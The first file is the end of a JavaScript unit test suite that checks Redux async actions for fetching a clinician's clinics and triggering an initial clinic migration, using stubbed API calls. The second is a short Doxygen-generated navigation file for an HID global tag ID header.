} ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.getClinicsForClinician(api, clinicianId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_FETCHING_CLINICS_FOR_CLINICIAN }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.getClinicsForClinician.callCount).to.equal(1); }); }); describe('triggerInitialClinicMigration', () => { it('should trigger TRIGGER_INITIAL_CLINIC_MIGRATION_SUCCESS and it should call clinics.triggerInitialClinicMigration once for a successful request', () => { let clinicId = 'clinicId1'; let userId = 'userId1'; let api = { clinics: { triggerInitialClinicMigration: sinon.stub().callsArgWith(1, null, { userId }), }, }; let expectedActions = [ { type: 'TRIGGER_INITIAL_CLINIC_MIGRATION_REQUEST' }, { type: 'TRIGGER_INITIAL_CLINIC_MIGRATION_SUCCESS', payload: { clinicId: 'clinicId1' } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.triggerInitialClinicMigration(api, clinicId)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.clinics.triggerInitialClinicMigration.callCount).to.equal(1); }); it('should trigger TRIGGER_INITIAL_CLINIC_MIGRATION_FAILURE and it should call error once for a failed request', () => { let clinicId = 'clinicId1'; let api = { clinics: { triggerInitialClinicMigration: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}, null), }, }; let err = new Error(ErrorMessages.ERR_TRIGGERING_INITIAL_CLINIC_MIGRATION); err.status = 500; let expectedActions = [ { type: 'TRIGGER_INITIAL_CLINIC_MIGRATION_REQUEST' }, { type: 'TRIGGER_INITIAL_CLINIC_MIGRATION_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.triggerInitialClinicMigration(api, clinicId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_TRIGGERING_INITIAL_CLINIC_MIGRATION }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.clinics.triggerInitialClinicMigration.callCount).to.equal(1); }); }); }); });
paulreimer/makerlabs-acm
docs/hid__global__tag__id_8h.js
var hid__global__tag__id_8h = [ [ "TagFormatView", "struct_h_i_d_global_tag_i_d_1_1_tag_format_view.html", "struct_h_i_d_global_tag_i_d_1_1_tag_format_view" ], [ "ParityView", "struct_h_i_d_global_tag_i_d_1_1_parity_view.html", "struct_h_i_d_global_tag_i_d_1_1_parity_view" ], [ "operator==", "group__firmware.html#gaf24480ac916188ffb4d86cfff7735260", null ] ];